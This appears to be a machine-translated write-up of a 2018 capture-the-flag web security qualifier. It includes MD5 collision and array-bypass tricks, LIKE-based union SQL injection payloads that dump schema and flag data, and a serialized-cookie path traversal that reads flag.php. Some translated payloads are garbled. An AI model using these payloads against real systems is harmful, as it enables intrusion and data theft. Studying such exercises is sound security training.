2018web security test autumn qualifier writeup

Posted by trammel at 2020-04-07

Yesterday, I made too much food in the autumn preliminary competition of Anheng's web security test, and found that I was more and more stupid,

The last three web problems have not been solved (break heart)

Simple MD5

Title Link:

Title Description: easy MD5 cracking fail

easy MD5 cracking fail

View source code:

easy MD5 cracking <!--$_POST['data1']!=$_POST['data2']-->fail

Use array bypass

flag: flag{401cf19d304e557349fecda18110c138}


Title Link:

Title Description: MD5 crackingfail

MD5 crackingfail

Fundamentally speaking, MD5 algorithm is a summary algorithm, which can calculate the "characteristic string" composed of 32 bytes from the string composed of multiple bytes. For strings over 32 bytes,

The value calculated by MD5 must be a subset, so there must be two (or more) different strings that can get the same MD5 value. This is called MD5 collision.

As like as two peas, we need to find two strings with different strings but MD5 values exactly the same.

At this time, we use MD5 collision generator to generate

Same as the above question, first check the source code

MD5 cracking<!-- if((string)$_POST['data1']!==(string)$_POST['data2']&&md5($_POST['data1'])===md5($_POST['data2']))-->fail

Refer to a foreign article:

Use curl to solve this problem

curl -v -H "Cookie: PHPSESSID=0dvvm795lrkrck7r0t1gbn762n" --data "data1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&data2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2" flag:flag{9bd1ee7355b58e53214adb9a37b4cb82}

We can back up some MD5 encoded values in advance;

Article 1

M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2 M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

Second article

4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa200a8284bf36e8e4b55b35f427593d849676da0d1555d8360fb5f07fea2 4dc968ff0ee35c209572d4777b721587d36fa7b21bdc56b74a3dc0783e7b9518afbfa202a8284bf36e8e4b55b35f427593d849676da0d1d55d8360fb5f07fea2

MD5 hash:008ee33a9d58b51cfeb425b0959121c9


Try sending a flag

Title Link:

Title Description:

Use hackbar for post transfer according to the description of the topic

HackBar post flag{858a14671c27804b63e6e96b0acdfdd7}

Input try

Title Link:

Title Description:

First: check the source code:

<script> function check(){ var flag = document.getElementById("flag").value; var str = "d84d9657e5e5e" || 0; var str = str + ("ad2ad3fe" && 2); var str = str + "a2da9494b8" + "ddea4fd4"; var str = str.split("").reverse().join(""); if (str == flag){ alert("恭喜你已经找到flag!"); } } </script>

Id = "flag" found


Operate directly in the console:

Finally, the answer is: 4df4aedd8b49ad2a2e5e7569d48d


News search

Title Link:

Title Description:

Click in one:

If we continue to test, we will find that there are key words, number of them, initial guess is injection, key words input 1 'to find

Viewing source code discovery is front-end filtering:

function myFunction() { var x=document.getElementById("number").value; var a=document.getElementById("word").value; var b=a.replace(/[\ |\~|\`|\!|\@|\#|\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\||\\|\[|\]|\{|\}|\;|\:|\"|\'|\,|\<|\.|\>|\/|\?|\·|\!|\(|\)|\¥|\——|\……|\【|\】|\、|\;|\:|\‘|\“|\”|\’|\,|\。|\、|\《|\》|\?|\ ]/g,""); if(a.length!=b.length) { alert("请输入正确字符。"); document.getElementById("number").value = ''; document.getElementById("word").value = ''; } else if(isNaN(x)) { alert("请输入数字。"); document.getElementById("number").value = ''; }

Therefore, the JS code is manually disabled, and it is speculated that the back-end code is SQL injection at the key words query place

After a series of attempts, there is no echo. To change one's thinking, after all, the screen test time is very short, and there are many questions (QAQ). To get the flag is the king, use manual injection,

Keyword queries like this usually use fuzzy queries of like%%, so you need to close% and construct payload: 1% 'and 1 = 1 and'% '=

like%% % payload:1%' AND 1=1 AND '%'='

From the information echoed in the figure above, it can be seen that the injection is successful;

Let's learn something about like%%. First, we input

mysql> select * from tests where password like '%a%'; +---------+----------+ | usename | password | +---------+----------+ | admin | password | | admin | admin| +---------+----------+ 2 rows in set (0.00 sec) mysql> select * from tests where password like '%as%'; +---------+----------+ | usename | password | +---------+----------+ | admin | password | +---------+----------+ 1 row in set (0.00 sec)

It can be found that like% $value% is equivalent to /. \ * $value. \ * /, if injected, we need to close the preceding% ', and the following%'

like%$value% /.\*$value.\*/ %' %'

After understanding the injection of like%%, let's look at the topic


Get column

Payload: 1% 'order by 3 --: return to normal

payload: 1%' order by 3-- : payload: 1%' order by 4--:

There are three columns in the learning table

Retrieve obvious points

Payload: 1% 'union select 1,2,3 --: 1,2,3 appears at the bottom of the page

payload: 1%' union select 1,2,3--

Injection table, column, field, procedure omitted here

Directly given: payload: 1% 'union select (select group ﹣ concat (table ﹣ name) from information ﹣ schema. Tables where table ﹣ schema = database()), (select group ﹣ concat (column ﹣ name) from information ﹣ schema. Columns where table ﹣ schema = database()), flag from admin--

payload: 1%' union select (select group_concat(table_name) from information_schema.tables where table_schema=database()),(select group_concat(column_name) from information_schema.columns where table_schema=database()),flag from admin--

Finally, we get flag: Flag {f98505d1d12f50a0bd9463e90876630}


Use sqlmap to answer:

Input the post input box. The input parameters are in word, and sqlmap will come out as soon as it runs

post word sqlmap

First: query the database

Second: query the table

Then: query the fields

Finally: query the contents of columns

Finally, we get flag: Flag {f98505d1d12f50a0bd9463e90876630}



Title Link:

Title Description: play with snake skin

Enter the interface is a game of greedy snake. Decisively look at the JS code logic. F12 looks at the external JS script outside the source code and finds it in the source

So I guess this segment of Yan text should have information related to flag, so console will execute it

Obviously, the flag is wrong. Click view to continue

Finally, we get the answer: Flag {660332922504a5f06dd871a7fe78ba9c} so we can construct it a s: A: 1: {I: 0; s: 9: "index. PHP";}, Base64 followed by ytoxontpoja7czo5oijpbmrlec5wahaio30 =, BP playback to see the echo


New station

Title Link:

Title Description: a newly developed small station, see if you can find any problems

Click the link to enter and you will see a website. After you register your account, you will see:

Modify the type (jpg only) to upload a picture, and then check in the picture to find that there is a string of Base64 in the picture,

It is found that this string of bases is very long when viewed in BP. In the cookie of the request package, it is found that the picture value decoding is found as PHP serialization, and the saved file name of the uploaded file is found

Decryption with burp

Guess picture is passed in the execution file, and then the page shows Base64 of the file content. The index.php page is displayed, and the serialization is constructed manually. Here we will talk about the composition of a set of serialization

picture base64 index.php

Here's a chestnut:

a:2:{i:0;s:5:"1.jpg";i:1;s:5:"1.php";} a的意思就是数组array 2说明数组里面有两对值 分别为1.jpg与1.php i作为下标 s代表为string类型 5表示长度 即 0=>1.jpg 1=>1.php a:1:{i:0;s:9:"index.php";},base64后为YToxOntpOjA7czo5OiJpbmRleC5waHAiO30= burp

To do this, there are two ideas: one is to upload a sentence and get shell, because the path is exploded, just the type limit; the second is to directly guess where the flag is and read it.

getshell type flag

Both methods are simple

The first method: after changing the type to image / JPG, visit, and then pass in the command find / - name flag * * *.

type image/jpg find / -name flag***

The second method is to test and find that the flag is under.. / flag.php,

flag ../../flag.php

Then construct a: 1: {I: 0; s: 14: ".. / flag. PHP";} = > ytoxontpoja7czoxndoili4vli4vzmxhzy5wahaio30 =, request



GET /index.php/picture HTTP/1.1 Host: Proxy-Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Referer: Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Picture=YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30=; PHPSESSID=1vm2g30rlcqosqsj9ici1rdku1; session=eyJsb2dpbiI6dHJ1ZSwidXNlcm5hbWUiOiJYWEgifQ.DreFfA.iwKT84kXV5efjz90397IoKUYiik # response(part) <img src="data:image/jpg;base64,PD9waHAKCiRmbGFnID0gImZsYWd7TjRtZV9zUGFjNF9Jc19JbnQzcjNzdDFuZ30iOwplY2hvICJmbGFne1RoaXNfMVNfQV9GNGtlX2YxYUd9IjsK"> # base64解密 <?php $flag = "flag{N4me_sPac4_Is_Int3r3st1ng}"; echo "flag{This_1S_A_F4ke_f1aG}"; flag{This_1S_A_F4ke_f1aG}

Alas! Limited strength, can only make so many, as for the ranking feeling can not go to the next game ah.

Thank my friends for their help, thank them for their guidance (thx)